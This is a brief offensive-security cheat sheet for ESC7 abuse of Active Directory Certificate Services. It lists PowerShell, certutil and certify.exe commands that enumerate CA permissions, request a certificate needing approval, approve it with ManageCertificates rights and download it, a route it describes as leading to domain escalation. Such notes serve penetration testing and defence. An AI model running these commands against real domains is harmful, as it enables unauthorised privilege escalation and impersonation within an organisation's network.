ESC7
Vulnerable Certificate Authority Access Control
where 2 sets of permissions poses security risks:
- ManageCA (or
ManageCertificates
) - ManageCertificates (or
Certificate Manager
)
Enumerate using certsrv.msc
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-CertificationAuthorityAcl | select -expand Access
Query CA with certutil (EditFlags
value)
EDITF_ATTRIBUTESUBJECTALTNAME2
is set if the value is 1376590
.
ManageCA
Templates with ManageCA enables the principal to manipulate settings remotely using PSPKI. This includes toggling the EDITF_ATTRIBUTESUBJECTALTNAME2
flag to permit SAN specification in any template, a critical aspect of domain escalation.
Windows
ManageCA rights to perform the ESC6 attack
Note: this will not have any effect until the CA service (CertSvc) is restarted which ManageCA
users have but they can't do it remotely.
Request Certificate Template
PS /home/bobbuilder> certify.exe request /ca:<ca> /template:ApprovalNeeded
Import PSPKI
module
Import-Module PSPKI
Approve Pending Request
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-PendingRequest -RequestID 336 | Approve-CertificateRequest
Download Pending Request
PS /home/bobbuilder> certify.exe download /ca:<ca> /id:336
Disable EDITF_ATTRIBUTESUBJECTALTNAME2
with PowerShell
$ConfigReader.SetConfigEntry(1114446,"EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy") $ConfigReader.GetConfigEntry("EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")